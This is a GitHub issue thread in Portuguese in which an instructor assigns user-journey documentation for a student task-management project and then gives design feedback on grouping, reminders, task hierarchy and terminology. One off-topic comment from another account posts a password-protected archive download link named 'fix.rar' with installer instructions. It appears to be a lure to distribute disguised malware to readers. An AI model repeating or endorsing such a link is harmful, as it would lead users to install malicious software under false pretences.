### ISSUE TITLE
Definição de jornada do usuário

### ISSUE THREAD

**Issue by clararicioni** [abertanha/SistemaDeTarefas#3]

**Comment by clararicioni** [comment]
👉 Desenvolver as Jornadas dos Usuários da sua aplicação.

Veja a apresentação em anexo.

Como entregar:

- Criar um documento online (office 365 ou google docs).

- Colocar um link no README.md

- Enviar o repositório do projeto (todos enviam).

[Jornada do Usuário.pptx](https://github.com/user-attachments/files/16754844/Jornada.do.Usuario.pptx)

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by glaucotodesco** [comment]
Como que as tarefas são agrupadas?
Um usuário poderá ter 4 tarefas de um mesmo projeto ou ainda 4 tarefas de projetos diferentes. Como agrupar as tarefas?

**Comment by glaucotodesco** [comment]
Explicar melhor a funcionalidade "Compartilhamento de Tarefas com os membros"

**Comment by glaucotodesco** [comment]
Para que serve um "lembrete"?
É para lembrar uma tarefa? Comentar sobre uma tarefa?
Um comentário em uma tarefa não seria um lembrete?

**Comment by glaucotodesco** [comment]
Criar ordem hierárquica de tarefas não seria prioridades das tarefas?
Uma hierarquia significa que existe uma tarefa principal, que a partir dela sub tarefas são criadas.
Já prioridade é a ordem no qual as tarefas serão executadas.

**Comment by glaucotodesco** [comment]
Se for usar User Stories, mapear as principais User Stories do sistema e não ter apenas duas para constar.

**Comment by glaucotodesco** [comment]
Padronizar os termos, por exemplo, no documento aparece quadro e projeto, é a mesma coisa?

**Comment by glaucotodesco** [comment]
Explicar a ideia de hierarquia entre usuários, apareceu no texto no final.
